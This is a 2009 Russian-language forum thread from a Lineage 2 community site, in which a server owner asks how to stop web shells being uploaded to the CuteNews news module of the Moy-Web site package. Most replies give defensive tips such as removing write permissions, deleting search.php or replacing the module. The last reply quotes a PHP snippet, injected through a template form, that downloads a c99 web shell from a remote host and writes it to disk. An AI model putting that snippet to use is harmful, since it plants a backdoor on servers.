Перейти к содержимому
La2Base
Главная
ЗагрузкиВикиФорумFAQ
Поиск
ruen
Регистрация Войти
ГлавнаяФайлыВикиВойти
  • Главная
  • Загрузки
  • Вики
  • FAQ
  • Обратная связь
  • О проекте
  • Правила
  • Конфиденциальность
  • Условия использования

© 2026 la2base.com · Все права защищены

ruen
Форум/Web обвязка/[question]Шеллы
Поиск

[question]Шеллы

8 ответов152 просмотровСейчас просматривают: 1
SomeSay
SomeSay

Пользователь

Бывалый

Постов: 341

На форуме с: 27.02.2007

Репутация: +40

Рейтинг: 0

· 29.04.2009, 09:55

У меня такой вопрос:

Я использую обвязку Moy-Web, но как известно она очень уязвима.При мне залили шелла в папку news, даже когда я ее переименовывал все равно заливали.(Слава богу это было намерено по моей просьбе для теста).

Итак вопрос : Как защитить Moy-web от заливания файлов на него?

— рас!11рас!1

0
-=[BloodKill]=-
-=[BloodKill]=-

Пользователь

Ветеран

Постов: 1355

На форуме с: 01.09.2008

Репутация: +1179

Рейтинг: 0

· 29.04.2009, 09:59

Somesay: У меня такой вопрос:

Я использую обвязку Moy-Web, но как известно она очень уязвима.При мне залили шелла в папку news, даже когда я ее переименовывал все равно заливали.(Слава богу это было намерено по моей просьбе для теста).

Итак вопрос : Как защитить Moy-web от заливания файлов на него?

cutenews удали

— Оо

0
morfeus
morfeus

Пользователь

Ветеран

Постов: 608

На форуме с: 25.10.2008

Репутация: +218

Рейтинг: 0

· 29.04.2009, 10:10

chmod убираем право на запись......

— Perpetuum Mobile

0
SomeSay
SomeSay

Пользователь

Бывалый

Постов: 341

На форуме с: 27.02.2007

Репутация: +40

Рейтинг: 0

· 29.04.2009, 10:22

-=[BloodKill]=-: cutenews удали


Если я его удалю, то как добавлять новости?

morfeus: chmod убираем право на запись......


Как это сотворить?

— рас!11рас!1

0
St1ng3r
St1ng3r

Пользователь

Ветеран

Постов: 537

На форуме с: 05.02.2008

Репутация: +262

Рейтинг: 0

· 29.04.2009, 11:43

Удалить search.php в cutenews, так же для безопасности убирать права на запись после добавления новостей.
Права редактируются через ftp.

0
SomeSay
SomeSay

Пользователь

Бывалый

Постов: 341

На форуме с: 27.02.2007

Репутация: +40

Рейтинг: 0

· 29.04.2009, 12:39

Search.php удалил как установил обвяз.

Права на запись снял, но всеравно не помогает...

— рас!11рас!1

0
Руслан
Руслан

Модератор

Ветеран

Постов: 1201

На форуме с: 14.12.2007

Репутация: +775

Рейтинг: 0

· 29.04.2009, 18:56

Единственный способ обезопасить МВ - удалить ее mda.gif

По теме ответ дан - удалить папку News (новости в таком случае добавлять либо руками, либо используя более безопасный новостной движок) и по закрывать пару дыр.
Какие - уже обсуждалось на форуме.

На Форуме я тоже Radar!
Я везде Radar!

0
A
antarius

Пользователь

Новичок

Постов: 15

На форуме с: 01.04.2009

Репутация: +10

Рейтинг: 0

· 30.04.2009, 20:08

Или поставить ДЛЕ и не парить мосх.
Дам совет смени логин с root на какой тока сможеш придумать в коментах чтоб тока не ставились как бэ куй он зальёт шелл через шаблон.

Заливаетцо шелл в шаблоны через форму:
HTML;
$data=implode('',file('http://--/с99.php'));
$fp=fopen('./file.php','wb');
fputs($fp,$data);
fclose($fp);
удалить search.php
И не плохобы написать версию кутеневса тут не телепаты они в отпуске)

0
Тема закрыта для ответов